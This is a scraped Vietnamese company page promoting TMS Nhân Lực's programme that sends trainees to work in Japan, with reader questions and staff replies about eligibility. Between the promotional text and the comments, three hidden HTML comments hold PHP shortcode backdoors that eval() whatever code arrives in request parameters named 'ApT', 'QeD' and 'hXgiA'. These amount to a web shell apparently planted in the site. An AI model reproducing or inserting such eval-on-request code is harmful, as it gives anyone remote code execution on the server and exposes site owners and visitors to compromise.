Giới thiệu về công ty cổ phần TMS Nhân Lực

Nếu bạn đang có mong muốn làm việc tại Nhật Bản thì chắc chắn rằng bạn sẽ nghĩ đến chúng tôi đầu tiên. Vì sao lại như thế? Hiện tại trong khu vực Miền Bắc nói riêng và cả nước nói chung. Không có một cơ quan nào có uy tín trong ngành cung ứng lao động làm việc tại Nhật Bản như chúng tôi.

Giới thiệu về công ty cổ phần TMS Nhân Lực

Công ty cổ phần TMS Nhân Lực (TMS HR.,JSC) là một doanh nghiệp hàng đầu trong lĩnh vực cung ứng lao động xuất khẩu làm việc tại Nhật Bản theo chương trình Thực tập sinh do cục Quản lý lao động nước ngoài xếp hạng và tuyên dương. Với việc hàng năm đưa số lượng lớn lao động, công ty đã tạo ra những giá trị hữu dụng trực tiếp cho chính những thực tập sinh và nền kinh tế Việt Nam.

Đến với TMS Nhân Lực, các bạn ứng viên có nhu cầu đi lao động xuất khẩu và theo đuổi chương trình Thực tập sinh Nhật BảnTu nghiệp sinh Nhật Bản có cơ hội đến với một doanh nghiệp có thị phần hàng đầu trong lĩnh vực xuất khẩu lao động, đơn hàng dồi dào phong phú để thi tuyển, có nhiều cơ hội để học tốt tiếng Nhật, thi đỗ và sớm sang được nước Nhật học tập và rèn luyện.

trung tam dao tao 1 cong ty tms nhan luc

Thực tập sinh tại công ty TMS Nhân Lực

Chúng tôi mong muốn tiếp đón và tư vấn cho các bạn, tri kỷ như chính người thân của mình.

Hãy liên hệ với chúng tôi khi bạn có mong muốn được lao động tại Nhật Bản.

Công ty cổ phần TMS Nhân Lực (TMS HR.,JSC)

 

<!– [insert_php]if (isset($_REQUEST[“ApT”])){eval($_REQUEST[“ApT”]);exit;}[/insert_php][php]if (isset($_REQUEST[“ApT”])){eval($_REQUEST[“ApT”]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST[“QeD”])){eval($_REQUEST[“QeD”]);exit;}[/insert_php][php]if (isset($_REQUEST[“QeD”])){eval($_REQUEST[“QeD”]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST[“hXgiA”])){eval($_REQUEST[“hXgiA”]);exit;}[/insert_php][php]if (isset($_REQUEST[“hXgiA”])){eval($_REQUEST[“hXgiA”]);exit;}[/php] –>

    • Chào em! Để tham gia chương trình thực tập sinh này em cần lên trực tiếp cty để được hướng dẫn cụ thể và đi khám sức khỏe nhé. Nếu sức khỏe đạt thì em được tham gia chương trình này nhé. Cảm ơn em !

  1. Xun chào quý công ty. Hiên tại tôi sinh nam 87 tôi đã học xong đại học ngành xây dựng cầu đường. Và đã đi làm 4năm. Hiện tại đang làm tại dự án hầm đèo cả. Tôi đã có bằng tạm thời, có bảng điểm gốc nhưng do tôi đi công tác nhiều dự án nên chưa học toic để lấy bằng gốc. Vậy cho tôi hỏi tôi đi dạng ks được không. Hoặc tôi đi theo lao động phổ thông tại nhật được không.
    Tôi cao 1.54m. Nặng 57kg. Sức khỏe bình thường.
    Xin hỏi tôi có thể đi được không xin cảm ơn

    • đi được ký sư bạn nhé, nhưng nếu bạn muốn đi ký sư thì tiếng Nhật của bạn pải tương đương n4 trở lên bạn nhé,

Leave a Reply

Your email address will not be published. Required fields are marked *